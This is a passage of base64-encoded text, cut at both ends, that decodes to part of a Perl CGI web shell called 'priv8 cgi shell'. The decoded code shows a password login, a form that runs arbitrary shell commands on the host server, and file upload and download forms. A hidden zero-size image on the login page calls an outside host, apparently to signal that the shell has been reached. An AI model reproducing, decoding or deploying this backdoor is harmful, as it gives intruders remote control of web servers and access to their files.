2003. bGl0KC8mLywgJGluKTsNCgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQ0KCQl7DQoJCQkkaW5bJGld
2004. ID1+IHMvXCsvIC9nOw0KCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsN
2005. CgkJCSRrZXkgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkdmFsID1+IHMv
2006. JSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOw0KCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRl
2007. ZmluZWQoJGlueyRrZXl9KSk7DQoJCQkkaW57JGtleX0gLj0gJHZhbDsNCgkJfQ0KCX0NCn0NCg0K
2008. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2009. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgUGFnZSBIZWFkZXINCiMg
2010. QXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldA0K
2011. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2012. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUhlYWRlcg0Kew0KCSRFbmNvZGVk
2013. Q3VycmVudERpciA9ICRDdXJyZW50RGlyOw0KCSRFbmNvZGVkQ3VycmVudERpciA9fiBzLyhbXmEt
2014. ekEtWjAtOV0pLyclJy51bnBhY2soIkgqIiwkMSkvZWc7DQoJcHJpbnQgIkNvbnRlbnQtdHlwZTog
2015. dGV4dC9odG1sXG5cbiI7DQoJcHJpbnQgPDxFTkQ7DQo8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPnBy
2016. aXY4IGNnaSBzaGVsbDwvdGl0bGU+DQokSHRtbE1ldGFIZWFkZXINCg0KPG1ldGEgbmFtZT0ia2V5
2017. d29yZHMiIGNvbnRlbnQ9InByaXY4IGNnaSBzaGVsbCAgXyAgICAgaTVfQGhvdG1haWwuY29tIj4N
2018. CjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJwcml2OCBjZ2kgc2hlbGwgIF8gICAg
2019. aTVfQGhvdG1haWwuY29tIj4NCjwvaGVhZD4NCjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5m
2020. b2N1cygpIiBiZ2NvbG9yPSIjRkZGRkZGIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1h
2021. cmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiIHRleHQ9IiNGRjAwMDAiPg0KPHRhYmxlIGJv
2022. cmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+DQo8
2023. dHI+DQo8dGQgYmdjb2xvcj0iI0ZGRkZGRiIgYm9yZGVyY29sb3I9IiNGRkZGRkYiIGFsaWduPSJj
2024. ZW50ZXIiIHdpZHRoPSIxJSI+DQo8Yj48Zm9udCBzaXplPSIyIj4jPC9mb250PjwvYj48L3RkPg0K
2025. PHRkIGJnY29sb3I9IiNGRkZGRkYiIHdpZHRoPSI5OCUiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNp
2026. emU9IjIiPjxiPiANCjxiIHN0eWxlPSJjb2xvcjpibGFjaztiYWNrZ3JvdW5kLWNvbG9yOiNmZmZm
2027. NjYiPnByaXY4IGNnaSBzaGVsbDwvYj4gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvZm9u
2028. dD48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjRkZGRkZGIj48
2029. Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4NCg0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9u
2030. P2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+VXBs
2031. b2FkIEZpbGU8L2ZvbnQ+PC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxv
2032. YWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPjxmb250IGNvbG9yPSIjRkYwMDAwIj5Eb3dubG9hZCBG
2033. aWxlPC9mb250PjwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij48Zm9u
2034. dCBjb2xvcj0iI0ZGMDAwMCI+RGlzY29ubmVjdDwvZm9udD48L2E+IHwNCjwvZm9udD48L3RkPg0K
2035. PC90cj4NCjwvdGFibGU+DQo8Zm9udCBzaXplPSIzIj4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0t
2036. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2037. LS0tLS0tLS0tDQojIFByaW50cyB0aGUgTG9naW4gU2NyZWVuDQojLS0tLS0tLS0tLS0tLS0tLS0t
2038. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2039. LS0tDQpzdWIgUHJpbnRMb2dpblNjcmVlbg0Kew0KCSRNZXNzYWdlID0gcSQ8L2ZvbnQ+PGgxPnBh
2040. c3M9cHJpdjg8L2gxPjxmb250IGNvbG9yPSIjMDA5OTAwIiBzaXplPSIzIj48cHJlPjxpbWcgYm9y
2041. ZGVyPSIwIiBzcmM9Imh0dHA6Ly93d3cucHJpdjguaWJsb2dnZXIub3JnL3MucGhwPytjZ2l0ZWxu
2042. ZXQgc2hlbGwiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjwvcHJlPg0KJDsNCiMnDQoJcHJpbnQgPDxF
2043. TkQ7DQo8Y29kZT4NCg0KVHJ5aW5nICRTZXJ2ZXJOYW1lLi4uPGJyPg0KQ29ubmVjdGVkIHRvICRT
2044. ZXJ2ZXJOYW1lPGJyPg0KRXNjYXBlIGNoYXJhY3RlciBpcyBeXQ0KPGNvZGU+JE1lc3NhZ2UNCkVO
2045. RA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2046. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgbWVzc2FnZSB0aGF0
2047. IGluZm9ybXMgdGhlIHVzZXIgb2YgYSBmYWlsZWQgbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0t
2048. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2049. LS0NCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQ0Kew0KCXByaW50IDw8RU5EOw0KPGNvZGU+
2050. DQo8YnI+bG9naW46IGFkbWluPGJyPg0KcGFzc3dvcmQ6PGJyPg0KTG9naW4gaW5jb3JyZWN0PGJy
2051. Pjxicj4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2052. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50
2053. cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2054. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
2055. dWIgUHJpbnRMb2dpbkZvcm0NCnsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KDQo8Zm9ybSBuYW1l
2056. PSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCjxpbnB1dCB0eXBl
2057. PSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+DQo8L2ZvbnQ+DQo8Zm9udCBzaXplPSIz
2058. Ij4NCmxvZ2luOiA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2
2059. Ij5wcml2OCBjZ2kgc2hlbGw8L2I+PGJyPg0KcGFzc3dvcmQ6PC9mb250Pjxmb250IGNvbG9yPSIj
2060. MDA5OTAwIiBzaXplPSIzIj48aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InAiPg0KPGlucHV0
2061. IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0K
2062. DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2063. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRN
2064. TCBQYWdlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2065. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlRm9vdGVyDQp7DQoJ
2066. cHJpbnQgIjwvZm9udD48L2JvZHk+PC9odG1sPiI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
2067. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2068. LS0NCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNh
2069. biBiZSBhY2Nlc3NlcyB1c2luZyB0aGUNCiMgdmFyaWFibGUgJENvb2tpZXN7Jyd9DQojLS0tLS0t
2070. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2071. LS0tLS0tLS0tLS0tLS0tDQpzdWIgR2V0Q29va2llcw0Kew0KCUBodHRwY29va2llcyA9IHNwbGl0
2072. KC87IC8sJEVOVnsnSFRUUF9DT09LSUUnfSk7DQoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2ll
2073. cykNCgl7DQoJCSgkaWQsICR2YWwpID0gc3BsaXQoLz0vLCAkY29va2llKTsNCgkJJENvb2tpZXN7
2074. JGlkfSA9ICR2YWw7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2075. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0
2076. aGUgc2NyZWVuIHdoZW4gdGhlIHVzZXIgbG9ncyBvdXQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2077. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
2078. CnN1YiBQcmludExvZ291dFNjcmVlbg0Kew0KCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3Nl
2079. ZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0t
2080. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2081. LS0tLS0tLQ0KIyBMb2dzIG91dCB0aGUgdXNlciBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGxvZ2lu
2082. IGFnYWluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2083. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ291dA0Kew0KCXBy
2084. aW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUN
2085. CgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7DQoJJlByaW50TG9nb3V0U2NyZWVuOw0KDQoJJlByaW50
2086. TG9naW5TY3JlZW47DQoJJlByaW50TG9naW5Gb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoN
2087. CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2088. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9n
2089. aW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdA0KIyBkaXNwbGF5cyBhIHBh
2090. Z2UgdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gcnVuIGNvbW1hbmRzLiBJZiB0aGUgcGFzc3dvcmQg
2091. ZG9lbnMndA0KIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5
2092. cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXINCiMgdG8gbG9naW4NCiMtLS0tLS0tLS0tLS0t
2093. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2094. LS0tLS0tLS0NCnN1YiBQZXJmb3JtTG9naW4gDQp7DQoJaWYoJExvZ2luUGFzc3dvcmQgZXEgJFBh
2095. c3N3b3JkKSAjIHBhc3N3b3JkIG1hdGNoZWQNCgl7DQoJCXByaW50ICJTZXQtQ29va2llOiBTQVZF
2096. RFBXRD0kTG9naW5QYXNzd29yZDtcbiI7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJJlBy
2097. aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KCWVsc2Ug
2098. IyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoInAiKTsNCgkJ
2099. JlByaW50TG9naW5TY3JlZW47DQoJCWlmKCRMb2dpblBhc3N3b3JkIG5lICIiKSAjIHNvbWUgcGFz
2100. c3dvcmQgd2FzIGVudGVyZWQNCgkJew0KCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOw0KDQoJ
2101. CX0NCgkJJlByaW50TG9naW5Gb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KIy0t
2102. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2103. LS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0
2104. aGUgdXNlciB0byBlbnRlciBjb21tYW5kcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2105. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBy
2106. aW50Q29tbWFuZExpbmVJbnB1dEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
2107. RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8
2108. PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3Jp
2109. cHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFu
2110. ZCI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
2111. JFByb21wdA0KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPg0KPGlucHV0IHR5cGU9InN1Ym1p
2112. dCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCg0KRU5EDQp9DQoNCiMtLS0tLS0t
2113. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2114. LS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVz
2115. ZXIgdG8gZG93bmxvYWQgZmlsZXMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2116. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludEZp
2117. bGVEb3dubG9hZEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDog
2118. IlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxj
2119. b2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlv
2120. biI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
2121. PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImRvd25sb2FkIj4NCiRQcm9tcHQg
2122. ZG93bmxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBz
2123. aXplPSIzNSI+PGJyPjxicj4NCkRvd25sb2FkOiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0i
2124. QmVnaW4iPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
2125. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2126. LS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2Fk
2127. IGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2128. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlVXBsb2FkRm9ybQ0K
2129. ew0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVy
2130. TmFtZSAkQ3VycmVudERpcl1cJCAiOw0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNCjxmb3JtIG5h
2131. bWU9ImYiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCIgYWN0aW9u
2132. PSIkU2NyaXB0TG9jYXRpb24iPg0KJFByb21wdCB1cGxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxp
2133. bnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4NCk9wdGlvbnM6ICZu
2134. YnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgdmFsdWU9Im92ZXJ3cml0ZSI+DQpP
2135. dmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4NClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8
2136. aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIg
2137. bmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9
2138. ImEiIHZhbHVlPSJ1cGxvYWQiPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0t
2139. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2140. LS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdGltZW91
2141. dCBmb3IgYSBjb21tYW5kIGV4cGlyZXMuIFdlIG5lZWQgdG8NCiMgdGVybWluYXRlIHRoZSBzY3Jp
2142. cHQgaW1tZWRpYXRlbHkuIFRoaXMgZnVuY3Rpb24gaXMgdmFsaWQgb25seSBvbiBVbml4LiBJdCBp
2143. cw0KIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuDQojLS0t
2144. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2145. LS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQ29tbWFuZFRpbWVvdXQNCnsNCglpZighJFdpbk5UKQ0K
2146. CXsNCgkJYWxhcm0oMCk7DQoJCXByaW50IDw8RU5EOw0KPC94bXA+DQoNCjxjb2RlPg0KQ29tbWFu
2147. ZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25k
2148. KHMpLg0KPGJyPktpbGxlZCBpdCENCkVORA0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsN
2149. CgkJJlByaW50UGFnZUZvb3RlcjsNCgkJZXhpdDsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0t
2150. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2151. LS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQg
2152. ZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUNCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2Vy
2153. IHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkNCiMgY29tbWFu
2154. ZCBpcyBoYW5kbGVkIGRpZmZlcmVudGx5LiBJbiB0aGlzIGNhc2UsIHRoZSBuZXcgZGlyZWN0b3J5
2155. IGlzIHN0b3JlZCBpbg0KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRp
2156. bWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlDQojIG91dHB1dCBvZiB0aGUgY2hh
2157. bmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzDQojIHRo
2158. ZXJlZm9yZSBlcnJvciBtZXNzYWdlcyBjYW5ub3QgYmUgZGlzcGxheWVkLg0KIy0tLS0tLS0tLS0t
2159. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2160. LS0tLS0tLS0tLQ0Kc3ViIEV4ZWN1dGVDb21tYW5kDQp7DQoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9e
2161. XHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZA0KCXsNCgkJIyB3ZSBj
2162. aGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQ0KCQkjIGNv
2163. bW1hbmQgaXMgbm90IGRpc3BsYXllZC4NCgkJDQoJCSRPbGREaXIgPSAkQ3VycmVudERpcjsNCgkJ
2164. JENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4k
2165. Q21kUHdkOw0KCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7DQoJCSZQcmludFBhZ2VI
2166. ZWFkZXIoImMiKTsNCgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxA
2167. JFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOw0KCQlwcmludCAiJFByb21wdCAkUnVuQ29tbWFuZCI7
2168. DQoJfQ0KCWVsc2UgIyBzb21lIG90aGVyIGNvbW1hbmQsIGRpc3BsYXkgdGhlIG91dHB1dA0KCXsN
2169. CgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
2170. RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCgkJcHJpbnQg
2171. IiRQcm9tcHQgJFJ1bkNvbW1hbmQ8eG1wPiI7DQoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnRE
2172. aXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsNCgkJaWYoISRXaW5OVCkNCgkJ
2173. ew0KCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsNCgkJCWFsYXJtKCRDb21tYW5k
2174. VGltZW91dER1cmF0aW9uKTsNCgkJfQ0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBv
2175. dXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkDQoJCXsNCgkJCSR8PTE7DQoJCQkkQ29tbWFuZCAuPSAi
2176. IHwiOw0KCQkJb3BlbihDb21tYW5kT3V0cHV0LCAkQ29tbWFuZCk7DQoJCQl3aGlsZSg8Q29tbWFu
2177. ZE91dHB1dD4pDQoJCQl7DQoJCQkJJF8gPX4gcy8oXG58XHJcbikkLy87DQoJCQkJcHJpbnQgIiRf
2178. XG4iOw0KCQkJfQ0KCQkJJHw9MDsNCgkJfQ0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29t
2179. bWFuZCBjb21wbGV0ZXMNCgkJew0KCQkJcHJpbnQgYCRDb21tYW5kYDsNCgkJfQ0KCQlpZighJFdp
2180. bk5UKQ0KCQl7DQoJCQlhbGFybSgwKTsNCgkJfQ0KCQlwcmludCAiPC94bXA+IjsNCgl9DQoJJlBy
2181. aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0t
2182. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2183. LS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQg
2184. Y29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcg0KIyB0byBkb3dubG9hZCB0aGUg
2185. c3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gNCiMg
2186. ZmVhdHVyZSB0aGF0IHN0YXJ0cyB0aGUgZG93bmxvYWQgYXV0b21hdGljYWxseS4NCiMgQXJndW1l
2187. bnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2Fk
2188. ZWQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
2189. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludERvd25sb2FkTGlua1BhZ2UNCnsN
2190. Cglsb2NhbCgkRmlsZVVybCkgPSBAXzsNCglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBl
2191. eGlzdHMNCgl7DQoJCSMgZW5jb2RlIHRoZSBmaWxlIGxpbmsgc28gd2UgY2FuIHNlbmQgaXQgdG8g
2192. dGhlIGJyb3dzZXINCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJI
2193. KiIsJDEpL2VnOw0KCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2Fk
2194. JmY9JEZpbGVVcmwmbz1nbyI7DQoJCSRIdG1sTWV0YUhlYWRlciA9ICI8bWV0YSBIVFRQLUVRVUlW
